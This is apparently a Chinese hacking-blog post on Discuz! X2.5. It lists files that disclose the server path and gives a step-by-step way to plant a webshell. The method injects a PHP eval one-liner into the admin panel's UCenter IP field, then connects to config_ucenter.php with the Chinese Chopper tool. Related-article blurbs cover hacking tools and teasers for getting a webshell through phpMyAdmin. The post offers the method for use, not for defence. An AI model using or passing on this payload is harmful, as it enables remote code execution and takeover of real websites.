discuz! x2.5爆路径漏洞及后台拿shell

hacker5年前黑客文章1893

爆路径文件如下:

/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php

后台拿shell

需要有管理员帐号及密码,进入后台打开站长—-ucenter设置,直接在UCenter IP 地址:里面插入一句话

xxoo\\’);eval($_POST[a])?>;//

就ok ,然后菜刀连接 http://chnctocom/config/config_ucenter.php 密码a

标签: 黑客技术

相关文章

NTBScan这一黑客工具从cmd运作,扫描仪当地或远程控制

NTBScan这一黑客工具从cmd运作,扫描仪当地或远程控制

NTBScan这一黑客工具从cmd运作,以扫描仪当地或远程控制TCP / IP网络上的对外开放NETBIOS名字网络服务器。NBTS能够根据称之为nbtstat的规范Windows专用工具的作用和解...

WinDbg可用以调节核心方式运行内存转储

WinDbg可用以调节核心方式运行内存转储

什么叫WinDbg? WinDbg,像OllyDbg,是由Microsoft派发的Microsoft Windows多功能程序调试。该黑客工具可用以调节客户方式程序运行,驱动软件和电脑操作系统自身,...

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具对比,大家的經典黑客工具目录忽然看上去非常惨白。   被称作“USBee”,因为它以与航行中的蜜峰相近的方法运作,这类黑帽优化专...

EnCase是不是适用全部电脑操作系统?

EnCase是不是适用全部电脑操作系统?

什么叫EnCase? EnCase通常被稽查应用,是法医鉴定手机软件,它的应用使其变成医药学中的实际上的规范之一。   EnCase是完全免费的吗? 不,EnCase并不是完全免费的,但假...

LinuxHackingDistro一部分的全部别的发行

LinuxHackingDistro一部分的全部别的发行

一、Kali Linux Kali Linux是由十分火爆的Debian继承的Linux发行版,由Offensive Security建立。一般 简称为“帕苏”,专为数据调查取证和网站渗透测试而设计...

利用phpMyAdmin拿webshell

首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT N...